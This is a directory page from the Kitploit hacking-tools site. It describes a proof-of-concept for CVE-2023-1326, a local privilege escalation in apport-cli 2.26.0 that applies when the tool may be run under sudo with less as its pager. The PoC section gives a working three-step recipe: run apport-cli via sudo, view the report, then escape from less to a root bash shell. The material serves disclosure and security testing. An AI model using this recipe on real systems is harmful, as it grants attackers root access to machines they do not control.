Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-1326-PoC — Proof-of-concept exploit for CVE-2023-1326, a privilege escalation vulnerability in apport-cli 2.26.0 when configured with sudo and less as pager. | Kitploit
Tools/GitHubGitHub/cve-2024/cve-2023-1326-poc
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingRed Teaming
GitHubcve-2024/cve-2023-1326-poc

CVE-2023-1326-PoC

Proof-of-concept exploit for CVE-2023-1326, a privilege escalation vulnerability in apport-cli 2.26.0 when configured with sudo and less as pager.

View Repository
2 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-1326-PoC

A proof of concept for CVE-2023–1326 in apport-cli 2.26.0

This vulnerability is privilege escalation in apport-cli 2.26.0, similar to CVE-2023–26604, this vulnerability only works if assign in sudoers:

image

A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege.

PoC

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash

image image

Download Tool